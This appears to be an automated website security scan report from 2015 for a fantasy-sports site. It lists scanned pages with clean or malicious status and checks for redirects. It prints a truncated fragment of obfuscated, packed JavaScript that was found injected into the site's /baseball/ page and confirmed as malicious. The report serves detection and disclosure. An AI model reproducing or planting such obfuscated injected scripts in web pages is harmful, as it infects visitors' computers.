Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fullcourt.rotoreport.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://fullcourt.rotoreport.com/ | 200 OK Content-Length: 75530 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.idpreport.com <style type="text/css">
.larger,.linkstylebodysmall,.maintextsmall{font-family:Arial, Arial, Helvetica, sans-serif;font-size:14px;} .regular,.midsize,.BottonMenu{font-family:Arial, Arial, Helvetica, sans-serif;font-size:12px;} .small,.otc,.ffrs:link,.ffrs:visited,.ffrs:active{font-family:Arial, Arial, Helvetica, sans-serif;font-size:9px;} .hugest{font-family:Arial, Arial, Helvetica, sans-serif;font-size:36px;} .huge{ ...[3904 bytes skipped]... | ||
http://rotoreport.com/wp-content/themes/Wordpress_Magazine/javascript/p7exp.js | 200 OK Content-Length: 1057 Content-Type: application/x-javascript | clean |
http://rotoreport.com/wp-content/plugins/Viva-ThumbZoom/lib/v-zoom/viva-zoom-mini.js | 200 OK Content-Length: 62243 Content-Type: application/x-javascript | clean |
http://fullcourt.rotoreport.com/contentslider2.js | 200 OK Content-Length: 7892 Content-Type: application/x-javascript | clean |
http://ffreport.com/contentslider.js | 200 OK Content-Length: 7873 Content-Type: application/x-javascript | clean |
http://ffreport.com/chromejs/chrome.js | 200 OK Content-Length: 6395 Content-Type: application/x-javascript | clean |
http://ffreport.com/Slide2.js | 200 OK Content-Length: 721 Content-Type: application/x-javascript | clean |
http://rotoreport.com/wp-content/themes/Wordpress_Magazine/javascript/date.js | 200 OK Content-Length: 507 Content-Type: application/x-javascript | clean |
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en | 200 OK Content-Length: 2512 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19846 Content-Type: text/javascript | clean |
http://fullcourt.rotoreport.com/feed:http://rotoreport.com/?feed=rss2 | 404 Not Found Content-Length: 1089 Content-Type: text/xml | clean |
http://fullcourt.rotoreport.com/test404page.js | 404 Not Found Content-Length: 1034 Content-Type: text/html | clean |
http://fullcourt.rotoreport.com/feed:http://rotoreport.com/?feed=comments-rss2 | 404 Not Found Content-Length: 1098 Content-Type: text/xml | clean |
http://fullcourt.rotoreport.com/baseball/ | 404 Not Found Content-Length: 199886 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _01O='KkSKpcCfngCdpxGcz5yJlxWe0N3NywXe0lGbpJWazlmd3IDft92Y8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxnMk92afNna4IDfoRHZpdHfuVGZklGaBNDfkFWZoxXZtFmTnFGV5J0c05WZtVGbFRXZnxHewBDOxcjM8JXZyJXZmVmc8hHcwAjM3IDf0h2ZpVGa8VGchN2cl5Wd8VGdpJ3d8xmc1xHZh9Gbu92NywXZtFmcml2Nyw3bm5Wa8Rnbl1Wdj9GZENDfjJ3c0V2Z8t2b8VGd1JWayRHdBRXZzxnZlJHf05WZtV3YvRGOywndpR2NywnZpBjM8RWZkF2bsxHduVmdFh2YhRHdhx3ZhRldpRGMyw3dvRmbpdHOywHZh9Gb3IDfyQ2br91cqlDM8lGchlnclVXcqxnbvlGdj5WdmFEM8V2csFmZwIDfyFmd ...[4231 bytes skipped]... Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\' ...[16239 bytes skipped]... Antivirus reports:
| ||
http://fullcourt.rotoreport.com/wp-content/themes/Wordpress_Magazine/javascript/p7exp.js | 200 OK Content-Length: 1057 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fullcourt.rotoreport.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 20:36:56 GMT
Server: Apache/1.3.34 (Unix) PHP/5.2.17 mod_ssl/2.8.31 OpenSSL/1.0.0a
Content-Type: text/html; charset=UTF-8
X-Died: timeout at scan.pm line 1566.
X-Pingback: http://rotoreport.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: fullcourt.rotoreport.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 20:36:56 GMT
Server: Apache/1.3.34 (Unix) PHP/5.2.17 mod_ssl/2.8.31 OpenSSL/1.0.0a
Content-Type: text/html; charset=UTF-8
X-Died: timeout at scan.pm line 1566.
X-Pingback: http://rotoreport.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: fullcourt.rotoreport.com
Referer: http://www.google.com/search?q=fullcourt.rotoreport.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fullcourt.rotoreport.com
Referer: http://www.google.com/search?q=fullcourt.rotoreport.com
Result:
The result is similar to the first query. There are no suspicious redirects found.